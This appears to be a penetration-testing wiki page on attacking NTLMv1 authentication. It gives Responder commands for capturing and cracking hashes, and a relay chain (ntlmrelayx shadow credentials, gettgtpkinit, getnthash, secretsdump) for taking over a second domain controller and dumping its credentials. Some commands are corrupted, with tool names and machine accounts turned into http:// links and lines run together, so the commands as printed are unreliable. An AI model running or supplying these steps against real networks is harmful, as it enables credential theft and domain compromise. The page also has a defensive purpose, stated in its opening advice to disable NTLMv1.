NT LAN Manager version 1 (NTLMv1) is vulnerable to several attacks and should be disabled in environments whenever possible. All Microsoft operating systems support its successor NT Lan Manager version 2 (NTLMv2) which should be used instead.
A NTLMv1 hash is formatted like the following:
username::hostname:response:response:challenge -> NTHASH:responseIt is possible in environments where NT LAN Manager version 1 is utilized to obtain an NTLMv1 hash from a target computer.
While this was partially described in the Coercion section, prior to receiving a callback we need to run Responder, after modifying the 'Challenge' variable to 1122334455667788. We can then run Responder with the following options:
# Receive and attempt to crack the hash with crack.sh's rainbow tables
Responder.py -I $interface --lm
# Attempt to remove ESS/SSP and crack locally or for a fee
Responder.py -I $interface --lm --disable-essReferencing crack.sh, a NTLMv1 hash with ESS/SSP looks like the following:
hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788
After obtaining a hash with ESS/SSP, we first need to reformat the obtained hash using EvilMog's NTLMv1-multi tool or assless-chaps and cracked with a database of NT hashes.
{% hint style="warning" %} If we weren't able to remove the ESS/SSP with Responder then it will no longer be possible to crack with crack.sh’s rainbow tables. Instead, it can be submitted and crack on crack.sh for a fee. {% endhint %}
If NTLMv1 is enabled, you can leverage the ability where DC's have the ability to modify their own msDS-KeyCredentialLink attribute. It should be noted this requires two domain controllers to exploit.
1. ntlmrelayx.py -t ldap://$dc1 -of hashes --shadow-credentials --shadow-target '$dc2' --cert-outfile-path crt --no-validate-privs --remove-mic
2. gettgtpkinit.py -cert-pfx crt.pfx -pfx-pass PFX_PASSWORD http://contoso.com/DC2$ crt.ccache
3. KRB5CCNAME=crt.ccache http://getnthash.py http://contoso.com/DC2\$ -key KEY_FROM_PKINIT
4. secretsdump.py 'http://contoso.com/DC2$'@DC2 -hashes :LMHASH_FROM_GETNTHASH -history{% embed url="https://crack.sh/cracking-ntlmv1-w-ess-ssp/" %}
{% embed url="https://www.praetorian.com/blog/ntlmv1-vs-ntlmv2/" %}
{% embed url="https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/" %}
{% embed url="https://twitter.com/godacity_/status/1646282884020580352" %}